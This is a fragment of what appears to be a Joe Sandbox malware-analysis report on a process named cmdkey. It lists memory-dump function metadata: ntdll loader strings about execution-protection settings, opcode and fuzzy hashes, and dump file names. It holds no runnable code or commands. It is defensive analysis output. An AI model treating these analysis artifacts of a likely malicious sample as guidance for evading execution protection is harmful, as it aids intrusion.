                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: bdf7c5280c48894e8c984143dbb32709b9de975e3d6a7a5c505c573e9f45dcb4
                                                  • Instruction ID: 2508052273b55a42ec9e2e8e6339c22d1978217638a387e3fa65e8ce62bee962
                                                  • Opcode Fuzzy Hash: bdf7c5280c48894e8c984143dbb32709b9de975e3d6a7a5c505c573e9f45dcb4
                                                  • Instruction Fuzzy Hash: DF51FA31A00319AEFF10EB95DC95FAE77A9AF04314F0404BBE5159F291DB709A468B58
                                                  Function 03419046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@$@ww
                                                  • API String ID: 0-2844824024
                                                  • Opcode ID: fef429146a684a4d2389549d15a64e6e8e76531868ae30f578bdc547ee60e314
                                                  • Instruction ID: 935f14dcb1f8d90568f4d89b816daaeeb6385184e30276780bd3948eeb4858fb
                                                  • Opcode Fuzzy Hash: fef429146a684a4d2389549d15a64e6e8e76531868ae30f578bdc547ee60e314
                                                  • Instruction Fuzzy Hash: 66814A71D006699BDB35CF54CC44BEEBAB8AB08710F0445EBE919BB290D7709E85CFA4